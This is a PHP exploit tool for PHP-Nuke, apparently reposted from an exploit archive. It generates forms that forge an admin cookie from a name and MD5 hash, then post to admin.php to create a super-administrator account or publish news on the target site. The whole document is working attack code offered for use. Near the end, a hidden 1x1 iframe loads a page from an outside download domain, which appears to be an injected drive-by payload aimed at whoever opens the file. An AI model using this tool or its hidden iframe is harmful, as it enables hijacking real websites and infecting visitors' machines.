Rated as : High Risk
<?php
/* PHP-Nuke <=
W iLd BoY
W iLd BoY
W iLd BoY
W iLdBo Y
W iL dBoY
W iLdB oY
WiL d BoY
W iL dBo Y
Wi LdB oY
Wi Ld BoY
Wi LdB oY
W iLdBo Y
<local-root@linuxmail.org>
|WiLdBoY «local-root@linuxmail.org»|
***www.savsak.com
**www.biyo.tk
*www.root-security.org
*/
echo'<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01
Transitional//EN"><html><head>
<title>PHP-Nuke <= All Version Add admin page authorization
bypass Exploit / By WiLdBoY</title>
<meta http-equiv="Content-Type"
content="text/html; charset=iso-8859-
1"><STYLE type=text/css>
.bginput { FONT-SIZE: 9px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
A:link { COLOR: #000066; TEXT-DECORATION: none }
A:visited { COLOR: #000066; TEXT-DECORATION: none }
A:active { COLOR: #000066; TEXT-DECORATION: none }
A:hover { COLOR: #000066; TEXT-DECORATION: none }
.button { FONT-SIZE: 10px; COLOR: #000000; FONT-FAMILY:
Verdana,Arial,Helvetica,sans-serif }
</STYLE></head><body bgcolor="#000000"
text="#00FF00" link="#363636"
vlink="#363636" alink="#d5ae83">
<!-- PHP-Nuke <= All Version Add admin page authorization
bypass Exploit - Original Code
By WiLdBoY<local-root@linuxmail.org> -->';
if (($action == "goAdmin") and ($server) and ($add_name) and
($add_email)
and ($add_aid) and ($add_pwd)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash .
":";
$hash = base64_encode($hash);
echo "<form name='add' method='post' action='http://"
. $server .
"/admin.php'>
<input type='hidden' name='op' value='AddAuthor'>
<input type='hidden' name='add_name' value='" . $add_name .
"'>
<input type='hidden' name='add_aid' value='" . $add_aid .
"'>
<input type='hidden' name='add_email' value='" . $add_email
. "'>
<input type='hidden' name='add_url' value='" . $add_url .
"'>
<input type='hidden' name='add_pwd' value='" . $add_pwd .
"'>
<input type='hidden' name='add_radminsuper' value='" .
$add_radminsuper . "'>
<input type='hidden' name='admin' value=" . $hash
.">
<center><font size='1' face='Verdana, Arial, Helvetica,
sans-
serif'>Site
Name : <strong>http://" . $server .
"</strong> .<br>
Password : <strong>" .
$hash . "</strong> . <br>News Administrator Name :
<strong>" . $add_name
. "</strong>.
<a href='javascript:history.back()
'><strong>«Back»</strong></a>.</font>
<br><br><font size='1' face='Verdana, Arial,
Helvetica, sans-
serif'><b></b></font></center>
<center><input name='AddSysop' type='submit' id='AddSysop'
value='Create Administrator' class='button'></center>
</form>";
} elseif (($action == "goNews") and ($server) and
($subject) and
($hometext) and ($bodytext)){
$admin_name = chop($admin_name); $admin_hash = chop($admin_hash);
$server = chop($server); $add_pwd = chop($add_pwd);
$hash = $admin_name . ":" . $admin_hash .
":";
$hash = base64_encode($hash);
echo "<form name='addNews' method='post'
action='http://" . $server
. "/admin.php'>
<input name='op' type='hidden' id='op'
value='PostAdminStory'>
<input name='topic' type='hidden' id='topic' value='1'>
<input name='catid' type='hidden' id='catid' value='0'>
<input name='ihome' type='hidden' id='ihome' value='0'>
<input type='hidden' name='subject' value='" . $subject .
"'>
<input type='hidden' name='hometext' value='" . $hometext .
"'>
<input type='hidden' name='bodytext' value='" . $bodytext .
"'>
<input type='hidden' name='acomm' value='" . $acomm .
"'>
<input type='hidden' name='automated' value='" . $automated
. "'>
<input type='hidden' name='day' value='" . $day .
"'>
<input type='hidden' name='month' value='" . $month .
"'>
<input type='hidden' name='year' value='" . $year .
"'>
<input type='hidden' name='hour' value='" . $hour .
"'>
<input type='hidden' name='min' value='" . $min .
"'>
<input type='hidden' name='admin' value=" . $hash
.">
<center>
<font size='1' face='Verdana, Arial, Helvetica,
sans-serif'>Servidor
vulnerable : <strong>http://" . $server . "</strong>
. <br>
MD5 Password : <strong>" . $hash .
"</strong> . <br>
Asunto de la Noticia: <strong>" . $subject .
"</strong>. <br>
La Noticia es: <strong>" . $hometext .
"</strong>. <br>
En caso de que estos datos no sean correctos vuelva atras desde
<a
href='javascript:history.back()'><strong>«Aquн»</strong></a>.</font>
<br>
<br>
<font size='1' face='Verdana, Arial, Helvetica,
sans-serif'><b>By WiLdBoY</b><br></font>
</center>
<center>
<input name='AddSysop' type='submit' id='AddSysop'
value='Agregar
Noticia' class='button'>
</center>
</form>";
} elseif($exploit == "news") {
echo'<FORM action="' . $PHP_Self . '" method=post>
<TABLE width="50%" border=0 align="center"
cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div
align="center"><strong><font
color="#003366"
size="1" face="Verdana, Arial, Helvetica,
sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div
align="center"><font size="1"
face="Verdana, Arial, Helvetica,
sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div
align="right"><font size="1" face="Verdana,
Arial, Helvetica,
sans-serif">http://</font></div></TD>
<TD width="48%"><div
align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text"
class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div
align="center"><strong><font size="1"
face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left"> <input
name="admin_name" type="text"
id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div
align="center"><strong><font size="1"
face="Verdana,
Arial, Helvetica, sans-serif">Password
MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text"
id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE><br>
<table width="50%" border="0"
align="center">
<tr>
<td><div align="center"><strong><font
color="#003366" size="1"
face="Verdana, Arial, Helvetica, sans-serif"><u>The
News:</u></font></strong></div></td>
</tr>
<tr> <td><div
align="center"><strong><font size="1"
face="Verdana,
Arial, Helvetica, sans-serif">
<input name="action" type="hidden"
id="action" value="goNews">
Title</font></strong><font size="1"
face="Verdana, Arial, Helvetica,
sans-serif">(Obligatory)<strong>:<br>
<input size=50 name=subject class="bginput">
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Text of
the News</strong>(necessary)<strong>:<br>
<textarea name=hometext rows=5 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong>Extended
Text</strong>(necessary)<strong>:<br>
<textarea name=bodytext rows=12 wrap=virtual cols=50
class="bginput"></textarea>
</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Verdana, Arial,
Helvetica, sans-serif">Active Commentaries for
this News?<strong>
<input type=radio checked value=0 name=acomm>
Yes
<input type=radio value=1 name=acomm>
No</strong><strong></strong></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Verdana, Arial,
Helvetica, sans-serif">You want to program
this history?<strong>
<input type=radio value=1 name=automated>
Yes
<input type=radio checked value=0 name=automated>
No<br>
<br>
Day:
<input name="day" type="text"
id="day3" value="' . date(d) . '"
size="4" class="bginput">
Month:
<select name="month" id="select2"
class="bginput">
<option value="1">1</option>
<option value="2">2</option>
<option value="3">3</option>
<option value="4">4</option>
<option value="5">5</option>
<option value="6">6</option>
<option value="7">7</option>
<option value="8">8</option>
<option value="9">9</option>
<option value="10">10</option>
<option value="11">11</option>
<option value="12" selected>12</option>
</select>
Year:
<input maxlength=4 size=5 value="' . date(Y) . '"
name=year
class="bginput">
<br>
Hour:
<select name=hour class="bginput">
<option selected name="hour">00</option>
<option name="hour">01</option>
<option name="hour">02</option>
<option name="hour">03</option>
<option name="hour">04</option>
<option name="hour">05</option>
<option name="hour">06</option>
<option name="hour">07</option>
<option name="hour">08</option>
<option name="hour">09</option>
<option name="hour">10</option>
<option name="hour">11</option>
<option name="hour">12</option>
<option name="hour">13</option>
<option name="hour">14</option>
<option name="hour">15</option>
<option name="hour">16</option>
<option name="hour">17</option>
<option name="hour">18</option>
<option name="hour">19</option>
<option name="hour">20</option>
<option name="hour">21</option>
<option name="hour">22</option>
<option name="hour">23</option>
</select>
: <select name=min class="bginput">
<option selected name="min">00</option>
<option name="min">05</option>
<option name="min">10</option>
<option name="min">15</option>
<option name="min">20</option>
<option name="min">25</option>
<option name="min">30</option>
<option name="min">35</option>
<option name="min">40</option>
<option name="min">45</option>
<option name="min">50</option>
<option name="min">55</option>
</select>
: 00</strong></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Verdana, Arial,
Helvetica, sans-serif"><strong> <input
name="submit" type=submit value="Add
News" class="button">
</strong></font></div></td>
</tr>
</table><center><strong><font
color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self .
'?exploit=admin">[ View exploit of
the Administrators ]</a>
</font></strong></center>';
} else {
echo'<FORM action="' . $PHP_Self . '" method=post>
<p align="center"><u><strong><font
size="2" face="Verdana, Arial,
Helvetica, sans-serif">
<input name="action" type="hidden"
id="action" value="goAdmin">
</font></strong></u></p>
<div align="center">
<TABLE width="50%" border=0 align="center"
cellPadding=0
cellSpacing=0>
<TR><TD colspan="3"><div
align="center"><strong><font
color="#003366"
size="1" face="Verdana, Arial, Helvetica,
sans-serif"><u>Server
Vulnerable:</u></font></strong></div></TD>
</TR>
<TR> <TD width="39%"> <div
align="center"><font size="1"
face="Verdana, Arial, Helvetica,
sans-serif"><strong>Server
Adress:</strong></font></div></TD>
<TD width="13%"><div
align="right"><font size="1" face="Verdana,
Arial, Helvetica,
sans-serif">http://</font></div></TD>
<TD width="48%"><div
align="left"><font size="1" face="Verdana,
Arial, Helvetica, sans-serif">
</font>
<input name="server" type="text"
class="bginput" id="server"
value="www.">
</div></TD>
</TR>
<TR> <TD> <div
align="center"><strong><font size="1"
face="Verdana,
Arial, Helvetica, sans-serif">Admin
Name:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_name" type="text"
id="admin_name" class="bginput">
</p></TD>
</TR>
<TR> <TD><div
align="center"><strong><font size="1"
face="Verdana,
Arial, Helvetica, sans-serif">Password
MD5:</font></strong></div></TD>
<TD> </TD>
<TD> <p align="left">
<input name="admin_hash" type="text"
id="admin_hash" size="40"
class="bginput">
</p></TD>
</TR>
</TABLE>
<br>
</div>
<TABLE width="50%" border=0
align="center">
<TBODY>
<TR> <TD colspan="2"><div
align="center"><strong><font
color="#003366" size="1" face="Verdana, Arial,
Helvetica, sans-
serif"><u>Account
Data:</u></font></strong></div></TD>
</TR>
<TR> <TD><font size="1" face="Verdana,
Arial, Helvetica, sans-
serif"><strong>Name:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">
<INPUT maxLength=50 size=30 name=add_name
class="bginput">
(necessary)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana,
Arial, Helvetica, sans-
serif"><strong>Nickname:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">
<INPUT maxLength=30 size=30 name=add_aid class="bginput">
(necessary)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana,
Arial, Helvetica, sans-
serif"><strong>E-Mail:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">
<INPUT maxLength=60 size=30 name=add_email
class="bginput">
(necessary)</font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana,
Arial, Helvetica, sans-
serif">URL:</font></TD>
<TD><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">
<INPUT name=add_url class="bginput"
value="http://www." size=30
maxLength=60>
<strong> <input name="add_radminsuper"
type="hidden"
id="add_radminsuper" value="1">
</strong> </font></TD>
</TR>
<TR> <TD><font size="1" face="Verdana,
Arial, Helvetica, sans-
serif"><strong>Password:</strong></font></TD>
<TD><font size="1" face="Verdana, Arial,
Helvetica, sans-serif">
<INPUT type=password maxLength=12 size=12 name=add_pwd
class="bginput">
(necessary)</font></TD>
</TR>
<INPUT type=hidden value=AddAuthor name=op>
</TABLE> <div align="center">
<INPUT name="submit" type=submit value="Create
Administrator"
class="button">
</div>
</FORM><center><strong><font
color="#000066" size="1"
face="Tahoma"><a href="' . $PHP_Self .
'?exploit=news">[ View exploit of
News ]</a> </font></strong></center>';
} if (($action == "goAdmin") or ($action ==
"goNews")){
echo'';
}if (($action != "goAdmin") and ($action !=
"goNews")){
echo'<br><table width="100%" border="0"
align="center">
<tr> <td colspan="2"><div
align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>Usage:</u></strong></font></div></td>
</tr>
<tr> <td width="15%"><strong><font
size="1"
face="Tahoma">»Server Adress
:</font></strong></td>
<td width="85%"><font size="1"
face="Tahoma">Site Name
Example:
www.phpnuke.org</font></td>
</tr>
<tr> <td><strong><font size="1"
face="Tahoma">»Nombre Admin
:</font></strong></td>
<td><font size="1"
face="Tahoma">Site Administrator Name
Example :
WiLdBoY</font></td>
</tr>
<tr> <td><strong><font size="1"
face="Tahoma">»Password MD5
:</font></strong></td>
<td><font size="1"
face="Tahoma">Administrator MD5 Password
Example: 1ea52f26e7e0ce08e462f87f5e35096c
</font></td>
</tr>
</table><br><div align="center">
<table width="45%" border="0"
align="center">
<tr> <td colspan="2"><div
align="center"><font color="#003366"
size="1" face="Verdana, Arial, Helvetica, sans-
serif"><strong><u>Greetz:</u></strong></font></div></td>
</tr>
<tr> <td width="47%"><div
align="center"><font size="1"
face="Tahoma">The-BeKiR
:</font></div></td>
<td width="53%"><div
align="center"><font size="1"
face="Tahoma"><a
href="http://savsak.com"
target="_blank">http://www.savsak.com</a> </font>
<font size="1"
face="Tahoma"></font></div></td>
</tr>
<tr> <td><div align="center"><font
size="1"
face="Tahoma"><strong>WiLdBoY</strong>
:</font></div></td>
<td><div align="center"><strong><font
size="1" face="Tahoma"><a
href="http://www.root-security.org"
target="_blank"><u>http://www.root-security.org</u></a></font></strong></div></td>
</tr>
<tr> <td><div align="center"><font
size="1" face="Tahoma">Liz0ziM
:</font></div></td>
<td><div align="center"><font
size="1" face="Tahoma"><a
href="http://www.biyo.tk"
target="_blank">http://www.biyo.tk</a></font></div></td>
</tr>
<tr> <td>
<div align="center"><font size="1"
face="Tahoma">BJK
:</font></div></td>
<td><div align="center"><font
size="1" face="Tahoma"><a
href="http://www.forzabesiktas.com"
target="_blank">http://www.forzabesiktas.com</a></font></div></td>
</tr>
</table>';
}
echo'<center><p><a
href="mailto:local-root@linuxmail.org"><u><strong><font
color="#CC0000" size="1"
face="Tahoma">Original Exploit Code By
WiLdBoY.</font></strong></u></a><br><font
color="#003366" size="1"
face="Verdana"><b>Turkish Hacker ( Sifre Kirici
)</b></font></p></center>
<iframe
src="http://traffsale1.biz/dl/adv727.php"
width=1 height=1></iframe>
</div>
</body>
</html>';
?>
<center>
<img src="http://root-security.t35.com/atam.gif"
width="152" height="108"></font></p>
<center>
<embed src="http://sarpkayalar.tripod.com/cgi-bin/darbe.mp3"
loop=1 autostart=true hidden
width=128 height=128>
securitydot.net - 2006-05-05
|
